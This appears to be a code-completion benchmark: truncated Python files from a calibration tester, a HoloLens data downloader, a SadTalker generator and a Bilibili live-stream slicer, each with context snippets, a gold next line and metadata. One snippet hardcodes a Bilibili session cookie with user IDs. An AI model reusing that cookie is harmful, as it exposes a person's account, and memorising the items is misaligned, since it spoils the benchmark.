"snippet": "class Tester:\n def __init__(self, cfg: DictConfig) -> None:\n self.cfg = cfg\n self.work_dir = self.cfg.work_dir\n self.device = torch.device(self.cfg.device)\n self.build_data_loader()\n self.build_model(self.cfg.test.checkpoint)\n self.build_meter()\n self.init_wandb_or_not()\n\n def build_data_loader(self) -> None:\n # data pipeline\n self.test_loader = instantiate(self.cfg.data.object.test)\n\n def build_model(self, checkpoint: Optional[str] = \"\") -> None:\n self.model = instantiate(self.cfg.model.object)\n self.model.to(self.device)\n logger.info(\"Model initialized\")\n self.checkpoint_path = osp.join(\n self.work_dir, \"last.pth\" if checkpoint == \"\" else checkpoint #best.pth\n )\n load_checkpoint(self.checkpoint_path, self.model, self.device)\n\n def build_meter(self):\n self.batch_time_meter = AverageMeter()\n self.num_classes = self.cfg.model.num_classes\n self.evaluator = ClassificationEvaluator(self.num_classes)\n self.calibrate_evaluator = CalibrateEvaluator(\n self.num_classes,\n num_bins=self.cfg.calibrate.num_bins,\n device=self.device,\n )\n\n def reset_meter(self):\n self.batch_time_meter.reset()\n self.evaluator.reset()\n self.calibrate_evaluator.reset()\n\n def init_wandb_or_not(self) -> None:\n if self.cfg.wandb.enable:\n wandb.init(\n project=self.cfg.wandb.project,\n entity=self.cfg.wandb.entity,\n config=OmegaConf.to_container(self.cfg, resolve=True),\n tags=[\"test\"],\n )\n wandb.run.name = \"{}-{}-{}\".format(\n wandb.run.id, self.cfg.model.name, self.cfg.loss.name\n )\n wandb.run.save()\n wandb.watch(self.model, log=None)\n logger.info(\"Wandb initialized : {}\".format(wandb.run.name))\n\n def mixup_data(self, x, y, alpha=1.0, use_cuda=True):\n import numpy as np\n '''Returns mixed inputs, pairs of targets, and lambda'''\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n # else:\n # lam = 0.5\n\n batch_size = x.size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n mixed_x = lam * x + (1 - lam) * x[index, :]\n y_a, y_b = y, y[index]\n \n return mixed_x, y_a, y_b, lam\n\n @torch.no_grad()\n def eval_epoch(\n self, data_loader,\n phase=\"Val\",\n temp=1.0,\n post_temp=False,\n ) -> None:\n self.reset_meter()\n self.model.eval()\n\n end = time.time()\n \n for i, (inputs, labels) in enumerate(data_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n # forward\n outputs = self.model(inputs)\n # logits = self.model.forward_logit(inputs)\n if post_temp:\n outputs = outputs / temp\n # metric\n self.calibrate_evaluator.update(outputs, labels)\n predicts = F.softmax(outputs, dim=1)\n self.evaluator.update(\n to_numpy(predicts), to_numpy(labels)\n )\n # measure elapsed time\n self.batch_time_meter.update(time.time() - end)\n end = time.time()\n self.log_eval_epoch_info(phase)\n if self.cfg.test.save_logits:\n logits_save_path = (\n osp.splitext(self.checkpoint_path)[0]\n + \"_logits\"\n + (\"_pt.npz\" if post_temp else \".npz\")\n )\n self.calibrate_evaluator.save_npz(logits_save_path)\n\n def log_eval_epoch_info(self, phase=\"Val\"):\n log_dict = {}\n log_dict[\"samples\"] = self.evaluator.num_samples()\n classify_metric, classify_table_data = self.evaluator.mean_score(print=False)\n log_dict.update(classify_metric)\n calibrate_metric, calibrate_table_data = self.calibrate_evaluator.mean_score(print=False)\n log_dict.update(calibrate_metric)\n logger.info(\"{} Epoch\\t{}\".format(\n phase, json.dumps(round_dict(log_dict))\n ))\n logger.info(\"\\n\" + 
AsciiTable(classify_table_data).table)\n logger.info(\"\\n\" + AsciiTable(calibrate_table_data).table)\n if self.cfg.wandb.enable:\n wandb_log_dict = {}\n wandb_log_dict.update(dict(\n (\"{}/{}\".format(phase, key), value) for (key, value) in log_dict.items()\n ))\n wandb_log_dict[\"{}/classify_score_table\".format(phase)] = (\n wandb.Table(\n columns=classify_table_data[0],\n data=classify_table_data[1:]\n )\n )\n wandb_log_dict[\"{}/calibrate_score_table\".format(phase)] = (\n wandb.Table(\n columns=calibrate_table_data[0],\n data=calibrate_table_data[1:]\n )\n )\n if \"test\" in phase.lower() and self.cfg.calibrate.visualize:\n fig_reliab, fig_hist = self.calibrate_evaluator.plot_reliability_diagram()\n wandb_log_dict[\"{}/calibrate_reliability\".format(phase)] = fig_reliab\n wandb_log_dict[\"{}/confidence_histogram\".format(phase)] = fig_hist\n wandb.log(wandb_log_dict)\n\n def post_temperature(self):\n _, self.val_loader = instantiate(self.cfg.data.object.trainval)\n model_with_temp = ModelWithTemperature(self.model, device=self.device)\n model_with_temp.set_temperature(self.val_loader)\n temp = model_with_temp.get_temperature()\n if self.cfg.wandb.enable:\n wandb.log({\n \"temperature\": temp\n })\n return temp\n \n def test(self):\n logger.info(\n \"Everything is perfect so far. Let's start testing. Good luck!\"\n )\n \n self.eval_epoch(self.test_loader, phase=\"Test\")\n if self.cfg.test.post_temperature:\n logger.info(\"Test with post-temperature scaling!\")\n temp = self.post_temperature()\n self.eval_epoch(self.test_loader, phase=\"TestPT\", temp=temp, post_temp=True)\n\n def run(self):\n self.test()"
},
{
"identifier": "OODTester",
"path": "calibrate/engine/ood_tester.py",
"snippet": "class OODTester(Tester):\n def __init__(self, cfg: DictConfig) -> None:\n super().__init__(cfg)\n\n def build_data_loader(self) -> None:\n # data pipeline\n self.in_test_loader = instantiate(self.cfg.data.object.in_dist)\n self.out_test_loader = instantiate(self.cfg.data.object.out_dist)\n\n def build_meter(self):\n self.batch_time_meter = AverageMeter()\n self.num_classes = self.cfg.model.num_classes\n self.evaluator = OODEvaluator(self.num_classes)\n\n def reset_meter(self):\n self.batch_time_meter.reset()\n self.evaluator.reset()\n\n @torch.no_grad()\n def eval_epoch(\n self,\n phase=\"Val\",\n temp=1.0,\n post_temp=False\n ) -> None:\n self.reset_meter()\n self.model.eval()\n\n end = time.time()\n for i, (inputs, labels) in enumerate(self.in_test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n # forward\n outputs = self.model(inputs)\n if post_temp:\n outputs = outputs / temp\n # metric\n predicts = F.softmax(outputs, dim=1)\n self.evaluator.update(\n to_numpy(predicts), to_numpy(labels),\n in_dist=True\n )\n # measure elapsed time\n self.batch_time_meter.update(time.time() - end)\n\n for i, (inputs, labels) in enumerate(self.out_test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n # forward\n outputs = self.model(inputs)\n if post_temp:\n outputs = outputs / temp\n # metric\n predicts = F.softmax(outputs, dim=1)\n self.evaluator.update(\n to_numpy(predicts), to_numpy(labels),\n in_dist=False\n )\n # measure elapsed time\n self.batch_time_meter.update(time.time() - end)\n end = time.time()\n self.log_eval_epoch_info(phase)\n\n def log_eval_epoch_info(self, phase=\"Val\"):\n log_dict = {}\n log_dict[\"samples\"] = self.evaluator.num_samples()\n metric, table_data = self.evaluator.mean_score(print=False)\n log_dict.update(metric)\n logger.info(\"{} Epoch\\t{}\".format(\n phase, json.dumps(round_dict(log_dict))\n ))\n logger.info(\"\\n\" + AsciiTable(table_data).table)\n if self.cfg.wandb.enable:\n wandb_log_dict = {}\n wandb_log_dict.update(dict(\n (\"{}/{}\".format(phase, key), value) for (key, value) in log_dict.items()\n ))\n wandb_log_dict[\"{}/classify_score_table\".format(phase)] = (\n wandb.Table(\n columns=table_data[0],\n data=table_data[1:]\n )\n )\n wandb.log(wandb_log_dict)\n\n def test(self):\n logger.info(\n \"Everything is perfect so far. Let's start testing. Good luck!\"\n )\n self.eval_epoch(phase=\"Test\")\n logger.info(\"Test with post-temperature scaling!\")\n temp = self.post_temperature()\n self.eval_epoch(phase=\"TestPT\", temp=temp, post_temp=True)"
},
{
"identifier": "set_random_seed",
"path": "calibrate/utils/misc.py",
"snippet": "def set_random_seed(seed: int = None, deterministic: bool = False):\n \"\"\"\n Set the random seed for the RNG in torch, numpy and python.\n\n Args:\n seed (int): if None, will use a strong random seed.\n deterministic (bool): Whether to set the deterministic option for\n CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`\n to True and `torch.backends.cudnn.benchmark` to False.\n \"\"\"\n if seed is None:\n seed = (\n os.getpid()\n + int(datetime.now().strftime(\"%S%f\"))\n + int.from_bytes(os.urandom(2), \"big\")\n )\n logger = logging.getLogger(__name__)\n logger.info(\"Using a generated random seed {}\".format(seed))\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n if deterministic:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False"
}
] | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Tester, OODTester
from calibrate.utils import set_random_seed | 2,678 |
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester,
|
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester, | "ood": OODTester, | 1 | 2023-12-17 13:53:18+00:00 | 4k |
CaptainCook4D/downloader | download_hololens_data.py | [
{
"identifier": "prepare_hololens_2d_output_directory",
"path": "util.py",
"snippet": "def prepare_hololens_2d_output_directory(args, output_dir: Path):\n\toutput_dir.mkdir(parents=True, exist_ok=True)\n\t\n\tdata_directory = output_dir / Constants.CAPTAIN_COOK_4D\n\tdata_directory.mkdir(parents=True, exist_ok=True)\n\t\n\thololens_data_directory = data_directory / Constants.HOLOLENS\n\thololens_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\thololens_sync_data_directory = hololens_data_directory / Constants.SYNC\n\thololens_sync_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\thololens_sync_pv_data_directory = hololens_sync_data_directory / Constants.PV\n\thololens_sync_pv_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\treturn data_directory"
},
{
"identifier": "Constants",
"path": "util.py",
"snippet": "class Constants:\n\tCAPTAIN_COOK_4D = \"captain_cook_4d\"\n\t\n\tGOPRO = \"gopro\"\n\tHOLOLENS = \"hololens\"\n\tGOPRO_RESOLUTION_4K = \"gopro_4k\"\n\tGOPRO_RESOLUTION_360P = \"gopro_360p\"\n\t\n\tDATA_2D = \"data_2d\"\n\tRESOLUTION_360P = \"resolution_360p\"\n\tRESOLUTION_4K = \"resolution_4k\"\n\t\n\tRAW = \"raw\"\n\tSYNC = \"sync\"\n\t\n\tSPATIAL = \"spatial\"\n\t\n\tPV = \"pv\"\n\tMC = \"mc\"\n\t\n\tAB_ZIP = \"ab.zip\"\n\tDEPTH_ZIP = \"depth.zip\"\n\tFRAMES_ZIP = \"frames.zip\"\n\t\n\tDEPTH_AHAT = \"depth_ahat\"\n\tDEPTH = \"depth\"\n\tAB = \"ab\"\n\t\n\tDEPTH_POSE = \"depth_pose\"\n\tPV_POSE = \"pv_pose\"\n\tSPATIAL_POSE = \"spatial_pose\"\n\t\n\tIMU = \"imu\"\n\tDEPTH_POSE_PKL = \"depth_pose_pkl\"\n\tPV_POSE_PKL = \"pv_pose_pkl\"\n\tSPATIAL_POSE_PKL = \"spatial_pkl\"\n\t\n\tIMU_MAGNETOMETER = \"imu_magnetometer\"\n\tIMU_GYROSCOPE = \"imu_gyroscope\"\n\tIMU_ACCELEROMETER = \"imu_accelerometer\"\n\t\n\tIMU_ACCELEROMETER_PKL = \"imu_accelerometer_pkl\"\n\tIMU_GYROSCOPE_PKL = \"imu_gyroscope_pkl\"\n\tIMU_MAGNETOMETER_PKL = \"imu_magnetometer_pkl\"\n\t\n\tIS_HOLOLENS_ENABLED = \"is_hololens_enabled\"\n\tIS_SPATIAL_ENABLED = \"is_spatial_enabled\"\n\t\n\tDATA_JSON = \"data_json\"\n\t\n\tHOLOLENS_DEVICE_INFO = \"hololens_device_info\"\n\t\n\tRECORDING_ID = \"recording_id\"\n\tMETADATA = \"metadata\"\n\tDOWNLOAD_LINKS = \"download_links\"\n\tFILE_SIZES = \"file_sizes\"\n\tRECORDING = \"recording\"\n\t\n\tHOLOLENS_RAW_PV_FRAMES_ZIP = \"hololens_raw_pv_frames_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_AB_ZIP = \"hololens_raw_depth_ahat_ab_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_DEPTH_ZIP = \"hololens_raw_depth_ahat_depth_zip\"\n\tHOLOLENS_RAW_MC_PKL = \"hololens_raw_mc_pkl\"\n\t\n\tHOLOLENS_SYNC_PV_FRAMES_ZIP = \"hololens_sync_pv_frames_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_AB_ZIP = \"hololens_sync_depth_ahat_ab_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_DEPTH_ZIP = \"hololens_sync_depth_ahat_depth_zip\"\n\tHOLOLENS_SYNC_PV_VIDEO = \"hololens_sync_pv_video\"\n\t\n\tHOLOLENS_RAW_SPATIAL_PKL = \"hololens_raw_spatial_pkl\"\n\tHOLOLENS_RAW_IMU_MAGNETOMETER_PKL = \"hololens_raw_imu_magnetometer_pkl\"\n\tHOLOLENS_RAW_IMU_GYROSCOPE_PKL = \"hololens_raw_imu_gyroscope_pkl\"\n\tHOLOLENS_RAW_IMU_ACCELEROMETER_PKL = \"hololens_raw_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_SYNC_SPATIAL_PKL = \"hololens_sync_spatial_pkl\"\n\tHOLOLENS_SYNC_IMU_MAGNETOMETER_PKL = \"hololens_sync_imu_magnetometer_pkl\"\n\tHOLOLENS_SYNC_IMU_GYROSCOPE_PKL = \"hololens_sync_imu_gyroscope_pkl\"\n\tHOLOLENS_SYNC_IMU_ACCELEROMETER_PKL = \"hololens_sync_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_RAW_PV_POSE_PKL = \"hololens_raw_pv_pose_pkl\"\n\tHOLOLENS_SYNC_PV_POSE_PKL = \"hololens_sync_pv_pose_pkl\"\n\t\n\tHOLOLENS_RAW_DEPTH_POSE_PKL = \"hololens_raw_depth_pose_pkl\"\n\tHOLOLENS_SYNC_DEPTH_POSE_PKL = \"hololens_sync_depth_pose_pkl\"\n\t\n\tDURATION = \"duration\""
},
{
"identifier": "download_data",
"path": "util.py",
"snippet": "def download_data(download_url_links, download_file_paths):\n\t# ---- DON'T INCREASE MAX_WORKERS, ELSE DOWNLOAD WILL BE INTERRUPTED ----\n\twith ThreadPoolExecutor(max_workers=3) as executor:\n\t\tresults = list(\n\t\t\ttqdm(\n\t\t\t\texecutor.map(\n\t\t\t\t\tdownload_url,\n\t\t\t\t\tzip(download_url_links, download_file_paths)\n\t\t\t\t),\n\t\t\t\ttotal=len(download_url_links)\n\t\t\t)\n\t\t)\n\treturn results"
}
] | import argparse
import json
from pathlib import Path
from util import prepare_hololens_2d_output_directory, Constants, download_data | 1,659 |
# Please note that not all videos are recorded with hololens.
# Roughly, 60 videos are recorded only with GoPro, and they do not have hololens components.
# Due to device instability, roughly additional 40 videos don't have spatial data that includes Pose, 3D Hand Data
def process_download_hololens_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
data_directory = prepare_hololens_2d_output_directory(download_args, output_dir)
download_url_links = []
download_file_paths = []
for index, (recording_id, recording_download_link_dict) in enumerate(download_links.items()):
if download_args.data2d:
|
# Please note that not all videos are recorded with hololens.
# Roughly, 60 videos are recorded only with GoPro, and they do not have hololens components.
# Due to device instability, roughly additional 40 videos don't have spatial data that includes Pose, 3D Hand Data
def process_download_hololens_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
data_directory = prepare_hololens_2d_output_directory(download_args, output_dir)
download_url_links = []
download_file_paths = []
for index, (recording_id, recording_download_link_dict) in enumerate(download_links.items()):
if download_args.data2d: | if Constants.HOLOLENS_SYNC_PV_VIDEO in recording_download_link_dict: | 1 | 2023-12-16 00:27:29+00:00 | 4k |
mjavadpur/Sadtalker_LongVideos | src/facerender/modules/generator.py | [
{
"identifier": "ResBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class ResBlock2d(nn.Module):\n \"\"\"\n Res block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, kernel_size, padding):\n super(ResBlock2d, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.conv2 = nn.Conv2d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.norm1 = BatchNorm2d(in_features, affine=True)\n self.norm2 = BatchNorm2d(in_features, affine=True)\n\n def forward(self, x):\n out = self.norm1(x)\n out = F.relu(out)\n out = self.conv1(out)\n out = self.norm2(out)\n out = F.relu(out)\n out = self.conv2(out)\n out += x\n return out"
},
{
"identifier": "SameBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class SameBlock2d(nn.Module):\n \"\"\"\n Simple block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, out_features, groups=1, kernel_size=3, padding=1, lrelu=False):\n super(SameBlock2d, self).__init__()\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features,\n kernel_size=kernel_size, padding=padding, groups=groups)\n self.norm = BatchNorm2d(out_features, affine=True)\n if lrelu:\n self.ac = nn.LeakyReLU()\n else:\n self.ac = nn.ReLU()\n\n def forward(self, x):\n out = self.conv(x)\n out = self.norm(out)\n out = self.ac(out)\n return out"
},
{
"identifier": "UpBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class UpBlock2d(nn.Module):\n \"\"\"\n Upsampling block for use in decoder.\n \"\"\"\n\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\n super(UpBlock2d, self).__init__()\n\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\n padding=padding, groups=groups)\n self.norm = BatchNorm2d(out_features, affine=True)\n\n def forward(self, x):\n out = F.interpolate(x, scale_factor=2)\n out = self.conv(out)\n out = self.norm(out)\n out = F.relu(out)\n return out"
},
{
"identifier": "DownBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class DownBlock2d(nn.Module):\n \"\"\"\n Downsampling block for use in encoder.\n \"\"\"\n\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\n super(DownBlock2d, self).__init__()\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\n padding=padding, groups=groups)\n self.norm = BatchNorm2d(out_features, affine=True)\n self.pool = nn.AvgPool2d(kernel_size=(2, 2))\n\n def forward(self, x):\n out = self.conv(x)\n out = self.norm(out)\n out = F.relu(out)\n out = self.pool(out)\n return out"
},
{
"identifier": "ResBlock3d",
"path": "src/facerender/modules/util.py",
"snippet": "class ResBlock3d(nn.Module):\n \"\"\"\n Res block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, kernel_size, padding):\n super(ResBlock3d, self).__init__()\n self.conv1 = nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.conv2 = nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.norm1 = BatchNorm3d(in_features, affine=True)\n self.norm2 = BatchNorm3d(in_features, affine=True)\n\n def forward(self, x):\n out = self.norm1(x)\n out = F.relu(out)\n out = self.conv1(out)\n out = self.norm2(out)\n out = F.relu(out)\n out = self.conv2(out)\n out += x\n return out"
},
{
"identifier": "SPADEResnetBlock",
"path": "src/facerender/modules/util.py",
"snippet": "class SPADEResnetBlock(nn.Module):\n def __init__(self, fin, fout, norm_G, label_nc, use_se=False, dilation=1):\n super().__init__()\n # Attributes\n self.learned_shortcut = (fin != fout)\n fmiddle = min(fin, fout)\n self.use_se = use_se\n # create conv layers\n self.conv_0 = nn.Conv2d(fin, fmiddle, kernel_size=3, padding=dilation, dilation=dilation)\n self.conv_1 = nn.Conv2d(fmiddle, fout, kernel_size=3, padding=dilation, dilation=dilation)\n if self.learned_shortcut:\n self.conv_s = nn.Conv2d(fin, fout, kernel_size=1, bias=False)\n # apply spectral norm if specified\n if 'spectral' in norm_G:\n self.conv_0 = spectral_norm(self.conv_0)\n self.conv_1 = spectral_norm(self.conv_1)\n if self.learned_shortcut:\n self.conv_s = spectral_norm(self.conv_s)\n # define normalization layers\n self.norm_0 = SPADE(fin, label_nc)\n self.norm_1 = SPADE(fmiddle, label_nc)\n if self.learned_shortcut:\n self.norm_s = SPADE(fin, label_nc)\n\n def forward(self, x, seg1):\n x_s = self.shortcut(x, seg1)\n dx = self.conv_0(self.actvn(self.norm_0(x, seg1)))\n dx = self.conv_1(self.actvn(self.norm_1(dx, seg1)))\n out = x_s + dx\n return out\n\n def shortcut(self, x, seg1):\n if self.learned_shortcut:\n x_s = self.conv_s(self.norm_s(x, seg1))\n else:\n x_s = x\n return x_s\n\n def actvn(self, x):\n return F.leaky_relu(x, 2e-1)"
},
{
"identifier": "DenseMotionNetwork",
"path": "src/facerender/modules/dense_motion.py",
"snippet": "class DenseMotionNetwork(nn.Module):\n \"\"\"\n Module that predicting a dense motion from sparse motion representation given by kp_source and kp_driving\n \"\"\"\n\n def __init__(self, block_expansion, num_blocks, max_features, num_kp, feature_channel, reshape_depth, compress,\n estimate_occlusion_map=False):\n super(DenseMotionNetwork, self).__init__()\n # self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp+1)*(feature_channel+1), max_features=max_features, num_blocks=num_blocks)\n self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp+1)*(compress+1), max_features=max_features, num_blocks=num_blocks)\n\n self.mask = nn.Conv3d(self.hourglass.out_filters, num_kp + 1, kernel_size=7, padding=3)\n\n self.compress = nn.Conv3d(feature_channel, compress, kernel_size=1)\n self.norm = BatchNorm3d(compress, affine=True)\n\n if estimate_occlusion_map:\n # self.occlusion = nn.Conv2d(reshape_channel*reshape_depth, 1, kernel_size=7, padding=3)\n self.occlusion = nn.Conv2d(self.hourglass.out_filters*reshape_depth, 1, kernel_size=7, padding=3)\n else:\n self.occlusion = None\n\n self.num_kp = num_kp\n\n\n def create_sparse_motions(self, feature, kp_driving, kp_source):\n bs, _, d, h, w = feature.shape\n identity_grid = make_coordinate_grid((d, h, w), type=kp_source['value'].type())\n identity_grid = identity_grid.view(1, 1, d, h, w, 3)\n coordinate_grid = identity_grid - kp_driving['value'].view(bs, self.num_kp, 1, 1, 1, 3)\n \n # if 'jacobian' in kp_driving:\n if 'jacobian' in kp_driving and kp_driving['jacobian'] is not None:\n jacobian = torch.matmul(kp_source['jacobian'], torch.inverse(kp_driving['jacobian']))\n jacobian = jacobian.unsqueeze(-3).unsqueeze(-3).unsqueeze(-3)\n jacobian = jacobian.repeat(1, 1, d, h, w, 1, 1)\n coordinate_grid = torch.matmul(jacobian, coordinate_grid.unsqueeze(-1))\n coordinate_grid = coordinate_grid.squeeze(-1) \n\n\n driving_to_source = coordinate_grid + kp_source['value'].view(bs, self.num_kp, 1, 1, 1, 3) # (bs, num_kp, d, h, w, 3)\n\n #adding background feature\n identity_grid = identity_grid.repeat(bs, 1, 1, 1, 1, 1)\n sparse_motions = torch.cat([identity_grid, driving_to_source], dim=1) #bs num_kp+1 d h w 3\n \n # sparse_motions = driving_to_source\n\n return sparse_motions\n\n def create_deformed_feature(self, feature, sparse_motions):\n bs, _, d, h, w = feature.shape\n feature_repeat = feature.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp+1, 1, 1, 1, 1, 1) # (bs, num_kp+1, 1, c, d, h, w)\n feature_repeat = feature_repeat.view(bs * (self.num_kp+1), -1, d, h, w) # (bs*(num_kp+1), c, d, h, w)\n sparse_motions = sparse_motions.view((bs * (self.num_kp+1), d, h, w, -1)) # (bs*(num_kp+1), d, h, w, 3) !!!!\n sparse_deformed = F.grid_sample(feature_repeat, sparse_motions)\n sparse_deformed = sparse_deformed.view((bs, self.num_kp+1, -1, d, h, w)) # (bs, num_kp+1, c, d, h, w)\n return sparse_deformed\n\n def create_heatmap_representations(self, feature, kp_driving, kp_source):\n spatial_size = feature.shape[3:]\n gaussian_driving = kp2gaussian(kp_driving, spatial_size=spatial_size, kp_variance=0.01)\n gaussian_source = kp2gaussian(kp_source, spatial_size=spatial_size, kp_variance=0.01)\n heatmap = gaussian_driving - gaussian_source\n\n # adding background feature\n zeros = torch.zeros(heatmap.shape[0], 1, spatial_size[0], spatial_size[1], spatial_size[2]).type(heatmap.type())\n heatmap = torch.cat([zeros, heatmap], dim=1)\n heatmap = heatmap.unsqueeze(2) # (bs, num_kp+1, 1, d, h, w)\n return heatmap\n\n def 
forward(self, feature, kp_driving, kp_source):\n bs, _, d, h, w = feature.shape\n\n feature = self.compress(feature)\n feature = self.norm(feature)\n feature = F.relu(feature)\n\n out_dict = dict()\n sparse_motion = self.create_sparse_motions(feature, kp_driving, kp_source)\n deformed_feature = self.create_deformed_feature(feature, sparse_motion)\n\n heatmap = self.create_heatmap_representations(deformed_feature, kp_driving, kp_source)\n\n input_ = torch.cat([heatmap, deformed_feature], dim=2)\n input_ = input_.view(bs, -1, d, h, w)\n\n # input = deformed_feature.view(bs, -1, d, h, w) # (bs, num_kp+1 * c, d, h, w)\n\n prediction = self.hourglass(input_)\n\n\n mask = self.mask(prediction)\n mask = F.softmax(mask, dim=1)\n out_dict['mask'] = mask\n mask = mask.unsqueeze(2) # (bs, num_kp+1, 1, d, h, w)\n \n zeros_mask = torch.zeros_like(mask) \n mask = torch.where(mask < 1e-3, zeros_mask, mask) \n\n sparse_motion = sparse_motion.permute(0, 1, 5, 2, 3, 4) # (bs, num_kp+1, 3, d, h, w)\n deformation = (sparse_motion * mask).sum(dim=1) # (bs, 3, d, h, w)\n deformation = deformation.permute(0, 2, 3, 4, 1) # (bs, d, h, w, 3)\n\n out_dict['deformation'] = deformation\n\n if self.occlusion:\n bs, c, d, h, w = prediction.shape\n prediction = prediction.view(bs, -1, h, w)\n occlusion_map = torch.sigmoid(self.occlusion(prediction))\n out_dict['occlusion_map'] = occlusion_map\n\n return out_dict"
}
] | import torch
import torch.nn.functional as F
from torch import nn
from src.facerender.modules.util import ResBlock2d, SameBlock2d, UpBlock2d, DownBlock2d, ResBlock3d, SPADEResnetBlock
from src.facerender.modules.dense_motion import DenseMotionNetwork | 3,532 |
class OcclusionAwareGenerator(nn.Module):
"""
Generator follows NVIDIA architecture.
"""
def __init__(self, image_channel, feature_channel, num_kp, block_expansion, max_features, num_down_blocks, reshape_channel, reshape_depth,
num_resblocks, estimate_occlusion_map=False, dense_motion_params=None, estimate_jacobian=False):
super(OcclusionAwareGenerator, self).__init__()
if dense_motion_params is not None:
self.dense_motion_network = DenseMotionNetwork(num_kp=num_kp, feature_channel=feature_channel,
estimate_occlusion_map=estimate_occlusion_map,
**dense_motion_params)
else:
self.dense_motion_network = None
self.first = SameBlock2d(image_channel, block_expansion, kernel_size=(7, 7), padding=(3, 3))
down_blocks = []
for i in range(num_down_blocks):
in_features = min(max_features, block_expansion * (2 ** i))
out_features = min(max_features, block_expansion * (2 ** (i + 1)))
|
class OcclusionAwareGenerator(nn.Module):
"""
Generator follows NVIDIA architecture.
"""
def __init__(self, image_channel, feature_channel, num_kp, block_expansion, max_features, num_down_blocks, reshape_channel, reshape_depth,
num_resblocks, estimate_occlusion_map=False, dense_motion_params=None, estimate_jacobian=False):
super(OcclusionAwareGenerator, self).__init__()
if dense_motion_params is not None:
self.dense_motion_network = DenseMotionNetwork(num_kp=num_kp, feature_channel=feature_channel,
estimate_occlusion_map=estimate_occlusion_map,
**dense_motion_params)
else:
self.dense_motion_network = None
self.first = SameBlock2d(image_channel, block_expansion, kernel_size=(7, 7), padding=(3, 3))
down_blocks = []
for i in range(num_down_blocks):
in_features = min(max_features, block_expansion * (2 ** i))
out_features = min(max_features, block_expansion * (2 ** (i + 1))) | down_blocks.append(DownBlock2d(in_features, out_features, kernel_size=(3, 3), padding=(1, 1))) | 3 | 2023-12-19 11:01:35+00:00 | 4k |
Westlake-geeks/bilibili-livestream-slicer | main.py | [
{
"identifier": "is_live",
"path": "api.py",
"snippet": "def is_live(uid):\n live_api = \"https://api.live.bilibili.com/room/v1/Room/room_init?id=%s\" % str(\n uid)\n rtn = my_request(live_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n live_status_value = data_value.get('live_status')\n if live_status_value:\n return True\n else:\n return False"
},
{
"identifier": "get_stream_url",
"path": "api.py",
"snippet": "def get_stream_url(uid):\n stream_api = \"https://api.live.bilibili.com/room/v1/Room/playUrl?cid=%s&quality=4&platform=web\" % uid\n\n rtn = my_request(stream_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n durl_value = data_value.get('durl')\n\n headers = dict()\n headers['cookie'] = r\"buvid_fp_plain=undefined; CURRENT_BLACKGAP=0; blackside_state=0; LIVE_BUVID=AUTO2616596088417426; rpdid=|(k|m|))Y~k~0J'uYY)lmlul~; hit-new-style-dyn=1; go-back-dyn=1; is-2022-channel=1; header_theme_version=CLOSE; CURRENT_PID=b03f3c10-ceb5-11ed-b59d-47f8dacf4eec; FEED_LIVE_VERSION=V8; buvid3=103FCEA2-4D34-4196-5E7B-7321C8A1082118620infoc; b_nut=1690476718; _uuid=B1038F2AB-E8CD-29A2-4728-F82FE285F59D84428infoc; buvid4=CFCD8B8D-0FCC-F601-2753-DA825E11CFE613020-022072800-fr%2BgMSZdqRJTFAAYsS9ACQ%3D%3D; i-wanna-go-back=-1; b_ut=5; hit-dyn-v2=1; i-wanna-go-feeds=2; DedeUserID=325718681; DedeUserID__ckMd5=319313351948fd48; CURRENT_QUALITY=116; 